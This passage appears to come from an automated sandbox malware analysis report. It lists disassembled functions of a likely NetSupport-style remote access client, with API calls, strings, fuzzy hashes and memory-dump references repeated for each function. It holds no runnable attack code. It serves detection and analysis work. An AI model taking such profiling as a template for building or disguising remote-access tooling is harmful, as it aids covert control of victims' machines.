                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                    • String ID: %s%s.bin$364339$clientinv.cpp$m_pDoInv == NULL
                                                                                    • API String ID: 4180936305-437556765
                                                                                    • Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                    • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                    • Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                    • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                    Function 11144670 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                    • __strdup.LIBCMT ref: 111446A7
                                                                                      • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                      • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                    • _free.LIBCMT ref: 111446DC
                                                                                      • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                      • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                    • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 398584587-0
                                                                                    • Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                    • Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
                                                                                    • Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                    • Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
                                                                                    Function 1100ED70 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                      • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                    • _free.LIBCMT ref: 1100EDB4
                                                                                      • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                      • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                    • _free.LIBCMT ref: 1100EDC7
                                                                                    • _free.LIBCMT ref: 1100EDDA
                                                                                    • _free.LIBCMT ref: 1100EDED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                    • String ID:
                                                                                    • API String ID: 3515823920-0
                                                                                    • Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                    • Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
                                                                                    • Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                    • Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
                                                                                    Function 11145910 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                      • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                      • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                    • wsprintfA.USER32 ref: 1114593E
                                                                                    • wsprintfA.USER32 ref: 11145954
                                                                                      • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                      • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                      • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                    • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                    • API String ID: 3779116287-2600120591
                                                                                    • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                    • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                    • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                    • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                    Function 11143230 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
                                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile$CloseHandle
                                                                                    • String ID: "
                                                                                    • API String ID: 1443461169-123907689
                                                                                    • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                    • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                    • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                    • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
                                                                                    Function 1102D0D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,420B7E12,74DF2EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                    • String ID: Client$DisableGeolocation
                                                                                    • API String ID: 3315423714-4166767992
                                                                                    • Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                    • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                    • Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                    • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                    Function 110271B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                      • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                      • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                      • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                      • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                    • TranslateMessage.USER32(?), ref: 110271F0
                                                                                    • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                    • String ID: Exit Msgloop, quit=%d
                                                                                    • API String ID: 3212272093-2210386016
                                                                                    • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                    • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                    • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                    • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                    Function 110173F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 110173FD
                                                                                      • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101733C
                                                                                      • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                      • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                      • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                      • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017252
                                                                                      • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                      • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                      • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                    • SetEvent.KERNEL32(0000031C), ref: 1101741D
                                                                                    • GetTickCount.KERNEL32 ref: 11017423
                                                                                    Strings
                                                                                    • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                    • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                    • API String ID: 3804766296-4122679463
                                                                                    • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                    • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
                                                                                    • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                    • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                    Function 111377F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                    • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleThread__wcstoi64
                                                                                    • String ID: *AutoICFConfig$Client
                                                                                    • API String ID: 3257255551-59951473
                                                                                    • Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                    • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                    • Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                    • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                    Function 11070C60 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(000000FA), ref: 11070CB7
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 11070CC4
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 11070D96
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
